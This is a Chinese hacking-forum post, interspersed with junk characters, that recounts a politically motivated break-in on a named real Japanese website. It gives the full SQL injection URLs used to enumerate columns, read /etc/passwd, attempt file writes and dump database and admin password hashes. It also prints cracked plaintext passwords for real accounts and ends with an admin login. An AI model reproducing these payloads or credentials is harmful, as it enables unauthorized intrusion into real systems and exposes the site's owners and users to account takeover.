原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据
  @, f8 a% G; n3 k

% f. @* y( {- {0 h! h' F$ Owhatweb
  `: a* H+ d8 R3 x+ v, L' e' O. O
; o# m9 e5 ]9 E* C/ r  z
, W+ V! |1 M' I; E, |4 c8 F利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 W9 l) ^) X  b( @1 s

! M, N" t; X( }3 f0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
& U) h' [1 Z) U# R9 w$ @+ z
order by 28报错，order by 27正常

3 p. b, ]6 x. i* L0 p0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
1 [: O$ ^; p2 }2 q, ?
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
- _5 {, W2 _- z  q; @! H$ A9 l
0x05. info:
% d) B3 I1 }; T3 N0 \http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
. b! [0 ~) h1 x$ i! l4 W' ~database:    openpne
4 ]  r  L$ S0 Z: bversion:      4.1.22
os:             portbld-freebsd5.4
" I" _9 P, J! H5 P" b1 |# d
) g- B6 g# d* F# f0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

$ d' @- n  p9 |, `  L9 Q0x07. 利用 into outfile
- {, k$ c4 B3 Q- j! @; T$ t全部都失败
9 g: y  q2 `  S) B$ [3 Q2 Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
8 M1 o0 r& {$ |
. z  i) y7 e7 i) |页面显示“MDB2 Error:syntax error”

; v9 _: @2 k: d, f9 g9 p* w% @8 z- p8 ]0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
( Y' ~1 F2 Y+ ^中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( C& u6 ~" P. ]
; m8 Q8 K* v3 t) j- P) z* \: w( k
! U2 C5 o. t8 r/ L( c. p
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
4 J- j- k9 m% L* P/ q- G6 Z
0x10.  MySL外联方法
1 n2 j2 M1 X0 _, @" j0 r& j( V5 K从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
; e# H3 C- [4 _8 T  t1 n可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

- X/ O1 y! o7 W0 k2 p) _这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
& h, K; X1 a& F5 U2 F! t: f. Z工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
- B; K1 h7 e0 M" J# p/ K  r
: N1 \( [: N( Z! Y$ _
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

/ A3 [3 [! i1 u9 e% ]
/ E, B8 s9 T& P3 F# I( W0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

6 b  U/ U! U  s( ?6 F4 Q9 `0 F0 _表名 (c_admin_user) ，字段名（username,password）
- k! x6 O: m- _8 r; Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
. O8 z" _* z: b
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
( D4 D4 ^5 m( O( W3 q- a
0x13. 登录后台

1 w& u9 [1 \) G- P4 H( r
6 s* {6 W% S3 M6 b) j
0x14. 小结
' M8 F: T3 j4 S7 |) b: n利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
$ j# H4 i1 V( h- G' K
/ U4 u- f8 Q, P9 b最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
- @6 z, }# z# w% k' U8 ^

荒村狂客

哪个牛人 费的这劲 入侵的